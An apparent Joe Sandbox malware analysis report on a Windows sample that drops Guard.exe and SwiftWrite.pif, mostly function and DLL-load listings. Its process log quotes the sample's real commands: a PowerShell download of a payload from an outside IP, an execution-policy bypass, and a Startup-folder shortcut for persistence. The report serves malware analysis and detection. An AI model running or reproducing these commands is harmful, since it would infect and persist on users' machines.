Source: C:\Users\Public\Guard.exeCode function: 5_2_00B016635_2_00B01663
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B278C35_2_00B278C3
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2DBA55_2_00B2DBA5
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B21BA85_2_00B21BA8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B39CE55_2_00B39CE5
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B1DD285_2_00B1DD28
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2BFD65_2_00B2BFD6
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B21FC05_2_00B21FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0025B02012_2_0025B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002594E012_2_002594E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00259C8012_2_00259C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002723F512_2_002723F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002D840012_2_002D8400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0028650212_2_00286502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0028265E12_2_0028265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0025E6F012_2_0025E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027282A12_2_0027282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002889BF12_2_002889BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002D0A3A12_2_002D0A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00286A7412_2_00286A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00260BE012_2_00260BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027CD5112_2_0027CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002AEDB212_2_002AEDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B8E4412_2_002B8E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002D0EB712_2_002D0EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00286FE612_2_00286FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002733B712_2_002733B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027F40912_2_0027F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0026D45D12_2_0026D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0026F62812_2_0026F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0025166312_2_00251663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0025F6A012_2_0025F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002716B412_2_002716B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002778C312_2_002778C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027DBA512_2_0027DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00271BA812_2_00271BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00289CE512_2_00289CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0026DD2812_2_0026DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_00271FC012_2_00271FC0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027BFD612_2_0027BFD6
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00261A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00270D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00278B30 appears 42 times
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: String function: 00007FF75F168D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B11A36 appears 34 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B20D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00B28B30 appears 42 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@15/12@2/1
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C3778 GetLastError,FormatMessageW,0_2_00007FF75F1C3778
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF75F1AD5CC
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1ACCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF75F1ACCE0
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B58DE9 AdjustTokenPrivileges,CloseHandle,5_2_00B58DE9
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00B59399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002A8DE9 AdjustTokenPrivileges,CloseHandle,12_2_002A8DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,12_2_002A9399
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF75F1C59D8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BBE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF75F1BBE00
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C5F2C CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF75F1C5F2C
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F146580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF75F146580
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeFile created: C:\Users\Public\PublicProfile.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1hflgkb.uow.ps1Jump to behavior
Source: EO3RT0fEfb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: EO3RT0fEfb.exeReversingLabs: Detection: 55%
Source: EO3RT0fEfb.exeVirustotal: Detection: 45%
Source: unknownProcess created: C:\Users\user\Desktop\EO3RT0fEfb.exe "C:\Users\user\Desktop\EO3RT0fEfb.exe"
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe""Jump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: EO3RT0fEfb.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: EO3RT0fEfb.exeStatic file information: File size 1083904 > 1048576
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: EO3RT0fEfb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
